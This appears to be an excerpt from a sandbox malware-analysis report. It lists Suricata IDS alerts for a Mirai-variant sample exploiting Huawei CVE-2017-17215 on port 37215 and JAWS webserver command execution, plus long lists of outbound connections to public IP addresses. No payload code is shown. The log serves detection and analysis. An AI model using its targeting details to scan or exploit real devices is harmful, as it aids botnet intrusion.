          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33932 -> 156.124.218.204:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36900 -> 166.87.180.30:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45800 -> 67.200.144.191:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36900 -> 166.87.180.30:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45800 -> 67.200.144.191:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50504 -> 183.72.35.241:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50504 -> 183.72.35.241:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35834 -> 62.81.97.71:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35834 -> 62.81.97.71:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32922 -> 192.71.11.232:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:32922 -> 192.71.11.232:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33366 -> 168.40.98.66:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55418 -> 194.136.29.129:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43944 -> 82.36.75.217:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36486 -> 207.6.103.73:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43944 -> 82.36.75.217:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33366 -> 168.40.98.66:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59034 -> 91.25.207.212:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32976 -> 62.140.60.247:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43906 -> 154.12.222.99:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59008 -> 210.235.160.60:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43092 -> 103.233.244.33:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59008 -> 210.235.160.60:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36486 -> 207.6.103.73:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59034 -> 91.25.207.212:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52656 -> 156.112.179.153:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41052 -> 156.13.14.220:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35888 -> 186.91.189.154:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:32976 -> 62.140.60.247:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43906 -> 154.12.222.99:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35888 -> 186.91.189.154:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55562 -> 49.174.199.230:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48996 -> 197.229.68.102:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47234 -> 197.124.106.175:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34780 -> 115.232.232.112:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34780 -> 115.232.232.112:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43092 -> 103.233.244.33:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60632 -> 41.216.151.177:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55562 -> 49.174.199.230:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55418 -> 194.136.29.129:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60216 -> 77.229.189.177:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60216 -> 77.229.189.177:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53834 -> 41.68.184.21:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39940 -> 41.22.66.101:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50940 -> 197.116.245.92:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59990 -> 41.235.147.119:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41108 -> 57.128.103.183:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41108 -> 57.128.103.183:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56260 -> 187.32.72.153:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56260 -> 187.32.72.153:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48844 -> 41.146.239.215:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51124 -> 156.184.97.67:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57582 -> 197.253.75.14:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43848 -> 156.178.39.71:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33736 -> 156.172.76.226:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56998 -> 41.138.109.137:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53390 -> 37.38.112.105:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53390 -> 37.38.112.105:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51518 -> 145.255.225.142:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41294 -> 156.49.222.91:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44704 -> 197.104.106.51:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46292 -> 211.247.224.211:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46292 -> 211.247.224.211:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54090 -> 177.240.197.158:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51518 -> 145.255.225.142:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56432 -> 126.89.116.149:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49984 -> 172.129.180.89:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42038 -> 133.63.128.152:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46572 -> 77.166.16.193:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42038 -> 133.63.128.152:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39054 -> 62.206.122.112:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39054 -> 62.206.122.112:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54090 -> 177.240.197.158:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36198 -> 71.107.70.58:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59728 -> 157.144.82.44:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56432 -> 126.89.116.149:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59728 -> 157.144.82.44:80
          Source: global trafficTCP traffic: 197.182.150.52 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.30.210.59 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.102.44.50 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.169.65.12 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.20.73.21 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.114.0.176 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.39.222.203 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.76.215.181 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.239.245.97 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.239.136.95 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.11.234.71 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.55.1.55 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.109.94.3 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.216.11.220 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.50.222.108 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.118.4.89 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.207.200.148 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.103.198.240 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.179.229.36 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.64.147.204 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.60.127.235 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.128.252.146 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.52.221.239 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.210.47.55 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.129.30.140 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.51.163.157 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.12.72.106 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.8.11.88 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.216.42.135 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.137.241.91 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.80.5.217 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.39.24.101 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.139.190.122 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.24.22.94 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.127.217.93 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.183.76.9 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.3.125.219 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.172.247.123 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.152.166.172 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.136.60.44 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.192.21.35 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.56.241.214 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.233.68.55 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.127.40.17 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.83.78.200 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.89.216.25 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.33.63.87 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.37.105.215 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.219.228.221 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.229.59.42 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.225.62.99 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.191.63.29 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.5.174.12 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.44.65.231 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.244.69.91 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.226.104.9 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.78.14.23 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.35.240.176 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.12.97.194 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.218.115.231 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.22.57.239 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.205.238.8 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.124.162.20 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.214.136.27 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.124.223.63 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.153.90.7 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.132.20.173 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.44.41.186 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.198.33.59 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.254.249.22 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.180.42.121 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.225.154.176 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.222.173.61 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.245.183.230 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.138.185.63 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.176.75.160 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.91.60.222 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.31.245.66 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.133.138.154 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.124.104.90 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.237.84.222 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.108.104.133 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.139.6.245 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.153.26.169 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.71.81.79 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.126.159.167 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.206.65.53 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.102.132.47 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.18.236.6 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.118.244.135 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.224.235.220 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.48.47.131 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.218.101.201 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.155.56.244 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.17.237.146 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.26.175.43 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.105.66.175 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.109.45.0 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.17.199.225 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.13.155.161 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.233.99.239 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.94.125.48 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.4.91.99 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.94.87.80 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.236.120.28 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.48.171.144 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.50.177.180 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.185.210.127 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.239.148.54 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.139.0.15 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.109.3.169 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.190.206.108 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.71.254.60 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.199.60.93 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.116.236.157 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.51.116.203 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.240.254.59 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.233.165.119 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.197.4.197 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.14.129.186 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.173.218.244 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.10.249.14 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.214.140.143 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.158.22.120 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.94.54.53 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.124.233.120 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.130.195.184 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.58.180.53 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.85.56.131 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.84.138.115 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.0.163.77 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.167.207.7 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.121.70.97 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.159.201.255 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.73.213.155 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.59.3.73 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.120.215.197 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.23.82.249 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.93.143.174 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.127.38.136 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.154.109.16 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.33.221.5 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.39.217.97 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.184.34.62 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.39.111.7 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.47.39.144 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.151.185.150 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.220.130.19 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.60.210.146 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.68.172.139 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.90.8.223 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.232.219.94 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.200.219.131 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.78.143.166 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.164.190.46 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.1.147.85 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.203.0.206 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.84.243.69 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.199.72.12 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.174.220.21 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.97.141.127 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.200.174.88 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.118.155.217 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.60.175.252 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.141.196.164 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.111.180.24 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.55.219.98 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.84.183.155 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.209.52.144 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.155.197.201 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.227.93.12 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.122.240.172 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.121.169.198 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.246.67.42 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.177.89.213 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.253.48.69 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.250.121.148 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.76.130.82 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.178.65.228 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.38.109.86 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.221.149.119 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.27.71.62 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.76.2.165 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.129.174.150 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.204.185.0 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.66.247.224 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.29.4.215 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.202.75.102 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.134.46.13 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.167.189.84 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.101.136.237 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.93.225.250 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.98.45.73 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.192.236.217 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.211.46.49 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.115.87.97 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.66.130.140 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.81.119.77 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.227.119.238 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.41.83.44 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.149.143.9 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.147.13.185 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.10.30.195 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.213.27.240 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.215.215.104 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.107.99.183 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.9.172.76 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.185.119.64 ports 1,2,3,5,7,37215
